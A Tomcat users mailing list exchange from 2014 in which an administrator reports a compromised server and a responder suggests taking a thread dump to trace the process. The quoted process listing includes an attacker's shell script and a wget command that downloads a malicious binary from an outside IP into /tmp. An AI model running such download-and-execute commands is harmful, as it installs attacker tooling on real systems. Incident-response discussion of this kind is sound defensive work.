2014-04-30 0:41 GMT+04:00 Leonardo Santagostini <lsantagost...@gmail.com>: > Hello Dan, > > Nop, the attacker is executing locally the following > > tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh > tomcat 8893 8882 0 Apr27 ? 00:00:00 wget > http://218.199.102.59/.xy/squid32 -O /tmp/squid > > And the launch squid who tries to connect via ssh to varoius places. > > Right now its time to leave the office, but in a few hours i will paste in > pastebin access logs, config files, wherever you tell me. > > This is my pstree > > [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree > init─┬─atd > ├─java─┬─sh───wget > │ └─263*[{java}]
sh launched by tomcat's java? Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It shall show what is stacktrace in thread that launched external process. Best regards, Konstantin Kolinko --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
